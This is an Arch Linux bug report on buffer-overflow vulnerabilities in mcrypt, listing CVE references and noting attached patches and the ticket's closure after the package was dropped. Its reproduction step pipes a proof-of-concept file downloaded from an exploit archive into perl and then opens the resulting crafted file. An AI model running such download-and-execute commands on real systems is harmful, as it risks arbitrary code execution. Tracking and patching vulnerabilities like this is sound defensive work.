FS#32877 - [mcrypt] multiple security issues
Attached to Project:
Arch Linux
Opened by Jens Adam (byte) - Tuesday, 27 November 2012, 09:30 GMT
Last edited by Jan de Groot (JGC) - Thursday, 04 July 2013, 11:12 GMT
Details
Description:
"mcrypt versions 2.6.8 and below suffer from a vulnerability that is caused due to a boundary error in the processing of an encrypted file, which can be exploited to cause a stack-based buffer overflow when a user opens a specially crafted .nc file. Successful exploitation could potentially allow execution of arbitrary code on the affected machine."
Source: http://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.html
Links: http://security-tracker.debian.org/tracker/CVE-2012-4409
Steps to reproduce:
$ cd /tmp && curl -s http://dl.packetstormsecurity.net/1211-exploits/mcrypt-overflow.txt | perl && mdecrypt fake.nc
Our default build flags with stack protection will catch this, but a patch would be in order nonetheless.
Upon further investigation there are more issues:
http://security-tracker.debian.org/tracker/CVE-2012-4426 - already discussed and patched in the original thread starting at http://www.openwall.com/lists/oss-security/2012/09/06/1
http://security-tracker.debian.org/tracker/CVE-2012-4527 - another overflow regarding file names, source: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-4527
Patches and updated PKGBUILD attached.
Closed by Jan de Groot (JGC)
Thursday, 04 July 2013, 11:12 GMT
Reason for closing: Won't fix
Additional comments about closing: mcrypt was removed from repository.
There has been no further development on the net on this issue afaik, all other distributions had already applied the patches before I posted this here, the issue is four months old, and above is a ready-to-go PKGBUILD.
I don't care at all about mcrypt, its usefulness or upstream maintenance, but as long as packages contain security problems, we patch them, minor/obscure or not.
So: patch it, or drop it.